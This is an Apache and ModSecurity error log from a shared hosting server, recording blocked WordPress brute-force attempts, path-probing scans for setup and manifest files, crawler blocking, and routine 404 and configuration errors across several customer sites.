[Tue May 26 16:10:02.179107 2026] [security2:error] [pid 773493:tid 773696] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4gZgy-Vk4jSdqTCRLBQAAAM4"]
[Tue May 26 16:10:02.702430 2026] [core:crit] [pid 773493:tid 773644] (13)Permission denied: [client 66.249.70.136:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:10:02.987438 2026] [security2:error] [pid 773493:tid 773745] [client 173.239.254.140:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahV4f5gy-Vk4jSdqTCRK0AAA_3Q"]
[Tue May 26 16:10:04.228346 2026] [security2:error] [pid 773493:tid 773665] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4g5gy-Vk4jSdqTCRLMwAAAK8"]
[Tue May 26 16:10:04.949094 2026] [security2:error] [pid 773493:tid 773725] [client 106.219.85.83:27317] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV4hJgy-Vk4jSdqTCRLSAAAAOs"]
[Tue May 26 16:10:04.949174 2026] [security2:error] [pid 773493:tid 773725] [client 106.219.85.83:27317] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV4hJgy-Vk4jSdqTCRLSAAAAOs"]
[Tue May 26 16:10:06.038077 2026] [security2:error] [pid 773493:tid 773639] [client 34.136.232.32:64927] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 32.232.136.34.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "singhcouriercargo.com"] [uri "/xmlrpc.php"] [unique_id "ahV4hZgy-Vk4jSdqTCRLYgAAAJU"]
[Tue May 26 16:10:06.207682 2026] [security2:error] [pid 773493:tid 773633] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4hZgy-Vk4jSdqTCRLXQAAAI8"]
[Tue May 26 16:10:06.335238 2026] [security2:error] [pid 773493:tid 773683] [client 34.136.232.32:59894] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "singhcouriercargo.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahV4hpgy-Vk4jSdqTCRLaQAAAME"]
[Tue May 26 16:10:06.654315 2026] [security2:error] [pid 773493:tid 773653] [client 34.136.232.32:58581] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "singhcouriercargo.com"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahV4hpgy-Vk4jSdqTCRLcAAAAKM"]
[Tue May 26 16:10:06.947755 2026] [security2:error] [pid 773493:tid 773710] [client 34.136.232.32:55909] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "singhcouriercargo.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahV4hpgy-Vk4jSdqTCRLdAAAANw"]
[Tue May 26 16:10:07.236976 2026] [security2:error] [pid 773493:tid 773659] [client 34.136.232.32:63995] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "singhcouriercargo.com"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahV4h5gy-Vk4jSdqTCRLeAAAAKk"]
[Tue May 26 16:10:07.251164 2026] [security2:error] [pid 773493:tid 773635] [client 103.44.52.196:47726] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV4h5gy-Vk4jSdqTCRLeQAAAJE"]
[Tue May 26 16:10:07.251300 2026] [security2:error] [pid 773493:tid 773635] [client 103.44.52.196:47726] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV4h5gy-Vk4jSdqTCRLeQAAAJE"]
[Tue May 26 16:10:07.548170 2026] [security2:error] [pid 773493:tid 773629] [client 34.136.232.32:49824] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "singhcouriercargo.com"] [uri "/2020/wp-includes/wlwmanifest.xml"] [unique_id "ahV4h5gy-Vk4jSdqTCRLiAAAAIs"]
[Tue May 26 16:10:07.834471 2026] [security2:error] [pid 773493:tid 773597] [remote 14.161.17.36:48968] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.17.161.14.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "theafterglow-centre.com"] [uri "/wp-login.php"] [unique_id "ahV4h5gy-Vk4jSdqTCRLjAAAwGc"]
[Tue May 26 16:10:07.916281 2026] [security2:error] [pid 773493:tid 773641] [client 34.136.232.32:49801] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "singhcouriercargo.com"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahV4h5gy-Vk4jSdqTCRLkAAAAJc"]
[Tue May 26 16:10:07.916966 2026] [security2:error] [pid 773493:tid 773735] [client 81.56.233.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4h5gy-Vk4jSdqTCRLhwAAAPU"]
[Tue May 26 16:10:08.254096 2026] [security2:error] [pid 773493:tid 773636] [client 34.136.232.32:51564] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "singhcouriercargo.com"] [uri "/2021/wp-includes/wlwmanifest.xml"] [unique_id "ahV4iJgy-Vk4jSdqTCRLngAAAJI"]
[Tue May 26 16:10:08.444144 2026] [security2:error] [pid 773493:tid 773724] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4iJgy-Vk4jSdqTCRLkwAAAOo"]
[Tue May 26 16:10:08.542619 2026] [security2:error] [pid 773493:tid 773664] [client 34.136.232.32:55884] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "singhcouriercargo.com"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahV4iJgy-Vk4jSdqTCRLogAAAK4"]
[Tue May 26 16:10:08.760465 2026] [security2:error] [pid 773493:tid 773683] [client 66.249.70.68:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "afstpaul.org"] [uri "/index.php"] [unique_id "ahV4iJgy-Vk4jSdqTCRLmgAAAME"]
[Tue May 26 16:10:08.826952 2026] [security2:error] [pid 773493:tid 773719] [client 34.136.232.32:64154] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "singhcouriercargo.com"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahV4iJgy-Vk4jSdqTCRLrAAAAOU"]
[Tue May 26 16:10:09.180970 2026] [security2:error] [pid 773493:tid 773727] [client 34.136.232.32:49222] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "singhcouriercargo.com"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahV4iZgy-Vk4jSdqTCRLsAAAAO0"]
[Tue May 26 16:10:09.475321 2026] [security2:error] [pid 773493:tid 773700] [client 34.136.232.32:53746] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "singhcouriercargo.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahV4iZgy-Vk4jSdqTCRLtAAAANI"]
[Tue May 26 16:10:09.784257 2026] [security2:error] [pid 773493:tid 773687] [client 34.136.232.32:52746] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "singhcouriercargo.com"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahV4iZgy-Vk4jSdqTCRLuwAAAMU"]
[Tue May 26 16:10:10.341894 2026] [security2:error] [pid 773493:tid 773707] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4iZgy-Vk4jSdqTCRLvgAAANk"]
[Tue May 26 16:10:10.689272 2026] [core:error] [pid 773493:tid 773730] [client 198.235.24.56:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:10:10.689293 2026] [core:error] [pid 773493:tid 773730] [client 198.235.24.56:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:10:10.929465 2026] [security2:error] [pid 773493:tid 773579] [remote 52.18.195.140:54060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 140.195.18.52.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahV4ipgy-Vk4jSdqTCRL0gABAlU"]
[Tue May 26 16:10:12.270166 2026] [security2:error] [pid 773493:tid 773689] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4i5gy-Vk4jSdqTCRL7wAAAMc"]
[Tue May 26 16:10:14.563265 2026] [security2:error] [pid 773493:tid 773694] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4jpgy-Vk4jSdqTCRMGAAAAMw"]
[Tue May 26 16:10:15.511360 2026] [security2:error] [pid 773493:tid 773654] [client 106.219.85.83:28949] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV4j5gy-Vk4jSdqTCRMPgAAAKQ"]
[Tue May 26 16:10:15.511472 2026] [security2:error] [pid 773493:tid 773654] [client 106.219.85.83:28949] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV4j5gy-Vk4jSdqTCRMPgAAAKQ"]
[Tue May 26 16:10:16.497674 2026] [security2:error] [pid 773493:tid 773731] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4kJgy-Vk4jSdqTCRMTQAAAPE"]
[Tue May 26 16:10:17.729479 2026] [security2:error] [pid 773493:tid 773728] [client 103.44.52.196:33456] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV4kZgy-Vk4jSdqTCRMawAAAO4"]
[Tue May 26 16:10:17.729657 2026] [security2:error] [pid 773493:tid 773728] [client 103.44.52.196:33456] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV4kZgy-Vk4jSdqTCRMawAAAO4"]
[Tue May 26 16:10:17.999855 2026] [security2:error] [pid 773493:tid 773712] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4kZgy-Vk4jSdqTCRMaQAAAN4"]
[Tue May 26 16:10:20.348972 2026] [security2:error] [pid 773493:tid 773689] [client 185.191.171.10:59408] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/september-16th/list/"] [unique_id "ahV4lJgy-Vk4jSdqTCRMpAAAAMc"]
[Tue May 26 16:10:20.349117 2026] [security2:error] [pid 773493:tid 773689] [client 185.191.171.10:59408] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/september-16th/list/"] [unique_id "ahV4lJgy-Vk4jSdqTCRMpAAAAMc"]
[Tue May 26 16:10:20.574166 2026] [security2:error] [pid 773493:tid 773640] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4lJgy-Vk4jSdqTCRMnwAAAJY"]
[Tue May 26 16:10:21.466432 2026] [security2:error] [pid 773493:tid 773494] [remote 103.11.102.106:56656] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahV4lZgy-Vk4jSdqTCRMsQAA-wA"]
[Tue May 26 16:10:22.777864 2026] [security2:error] [pid 773493:tid 773733] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4lpgy-Vk4jSdqTCRM0gAAAPM"]
[Tue May 26 16:10:24.097138 2026] [security2:error] [pid 773493:tid 773693] [client 54.205.63.235:62887] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "goadityaholidays.com"] [uri "/wp-admin/setup-config.php"] [unique_id "ahV4mJgy-Vk4jSdqTCRM9gAAAMs"]
[Tue May 26 16:10:24.103000 2026] [security2:error] [pid 773493:tid 773740] [client 54.205.63.235:63136] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "goadityaholidays.com"] [uri "/wordpress/wp-admin/setup-config.php"] [unique_id "ahV4mJgy-Vk4jSdqTCRM-gAAAPo"]
[Tue May 26 16:10:24.104122 2026] [security2:error] [pid 773493:tid 773641] [client 54.205.63.235:63137] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "goadityaholidays.com"] [uri "/old/wp-admin/setup-config.php"] [unique_id "ahV4mJgy-Vk4jSdqTCRM-wAAAJc"]
[Tue May 26 16:10:24.105239 2026] [security2:error] [pid 773493:tid 773735] [client 54.205.63.235:63138] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "goadityaholidays.com"] [uri "/wp/wp-admin/setup-config.php"] [unique_id "ahV4mJgy-Vk4jSdqTCRM_AAAAPU"]
[Tue May 26 16:10:24.106005 2026] [security2:error] [pid 773493:tid 773730] [client 54.205.63.235:63139] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "goadityaholidays.com"] [uri "/wordpress1/wp-admin/setup-config.php"] [unique_id "ahV4mJgy-Vk4jSdqTCRM_QAAAPA"]
[Tue May 26 16:10:24.106496 2026] [security2:error] [pid 773493:tid 773633] [client 54.205.63.235:63140] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "goadityaholidays.com"] [uri "/staging/wp-admin/setup-config.php"] [unique_id "ahV4mJgy-Vk4jSdqTCRM_gAAAI8"]
[Tue May 26 16:10:24.108380 2026] [security2:error] [pid 773493:tid 773643] [client 54.205.63.235:63141] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "goadityaholidays.com"] [uri "/backup/wp-admin/setup-config.php"] [unique_id "ahV4mJgy-Vk4jSdqTCRM_wAAAJk"]
[Tue May 26 16:10:24.111466 2026] [security2:error] [pid 773493:tid 773669] [client 54.205.63.235:63143] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "goadityaholidays.com"] [uri "/wordpress/wp-admin/install.php"] [unique_id "ahV4mJgy-Vk4jSdqTCRNAQAAALM"]
[Tue May 26 16:10:24.111641 2026] [security2:error] [pid 773493:tid 773725] [client 54.205.63.235:63144] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "goadityaholidays.com"] [uri "/old/wp-admin/install.php"] [unique_id "ahV4mJgy-Vk4jSdqTCRNAgAAAOs"]
[Tue May 26 16:10:24.111902 2026] [security2:error] [pid 773493:tid 773707] [client 54.205.63.235:63142] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "goadityaholidays.com"] [uri "/wp-admin/install.php"] [unique_id "ahV4mJgy-Vk4jSdqTCRNAAAAANk"]
[Tue May 26 16:10:24.112054 2026] [security2:error] [pid 773493:tid 773715] [client 54.205.63.235:63145] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "goadityaholidays.com"] [uri "/staging/wp-admin/install.php"] [unique_id "ahV4mJgy-Vk4jSdqTCRNAwAAAOE"]
[Tue May 26 16:10:24.115329 2026] [security2:error] [pid 773493:tid 773739] [client 54.205.63.235:63147] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "goadityaholidays.com"] [uri "/wp/wp-admin/install.php"] [unique_id "ahV4mJgy-Vk4jSdqTCRNBQAAAPk"]
[Tue May 26 16:10:24.115367 2026] [security2:error] [pid 773493:tid 773747] [client 54.205.63.235:63146] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "goadityaholidays.com"] [uri "/wordpress1/wp-admin/install.php"] [unique_id "ahV4mJgy-Vk4jSdqTCRNBAAAAQE"]
[Tue May 26 16:10:24.115483 2026] [security2:error] [pid 773493:tid 773702] [client 54.205.63.235:63149] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "goadityaholidays.com"] [uri "/demo/wp-admin/install.php"] [unique_id "ahV4mJgy-Vk4jSdqTCRNBgAAANQ"]
[Tue May 26 16:10:24.116440 2026] [security2:error] [pid 773493:tid 773724] [client 54.205.63.235:63148] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "goadityaholidays.com"] [uri "/backup/wp-admin/install.php"] [unique_id "ahV4mJgy-Vk4jSdqTCRNBwAAAOo"]
[Tue May 26 16:10:24.234134 2026] [security2:error] [pid 773493:tid 773627] [client 54.205.63.235:63291] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "goadityaholidays.com"] [uri "/test/wp-admin/install.php"] [unique_id "ahV4mJgy-Vk4jSdqTCRNCwAAAIk"]
[Tue May 26 16:10:24.781591 2026] [security2:error] [pid 773493:tid 773748] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4mJgy-Vk4jSdqTCRNEgAAAQI"]
[Tue May 26 16:10:26.119168 2026] [security2:error] [pid 773493:tid 773739] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4mZgy-Vk4jSdqTCRNNAAAAPk"]
[Tue May 26 16:10:26.207968 2026] [security2:error] [pid 773493:tid 773723] [client 106.219.85.83:29054] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV4mpgy-Vk4jSdqTCRNPgAAAOk"]
[Tue May 26 16:10:26.208168 2026] [security2:error] [pid 773493:tid 773723] [client 106.219.85.83:29054] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV4mpgy-Vk4jSdqTCRNPgAAAOk"]
